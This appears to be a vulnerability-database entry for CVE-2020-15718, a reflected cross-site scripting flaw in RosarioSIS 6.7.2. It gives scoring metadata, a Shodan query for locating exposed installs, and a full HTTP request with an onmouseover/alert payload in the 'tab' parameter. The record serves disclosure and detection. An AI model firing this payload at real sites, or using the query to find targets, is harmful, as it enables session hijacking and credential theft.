| Title | RosarioSIS 6.7.2 - Cross-Site Scripting |
|---|---|
| Author | 0xr2r,jarvis-survives |
| Severity | Medium |
| Impact | An attacker can execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or other malicious actions. |
| Remediation | Update RosarioSIS to the latest version where input validation has been improved. |
| CVSS Score | 6.1 |
| EPSS Score | 0.13629 |
| CVE ID | CVE-2020-15718 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"RosarioSIS" |
| Tags | cve cve2020 rosarios xss rosariosis vuln |
RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The ‘tab’ parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL.
GET /Modules.php?modname=Users/Preferences.php&tab="%20onmouseover=alert(document.domain)%20x=" HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15718.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-15718.pcap
N/AN/A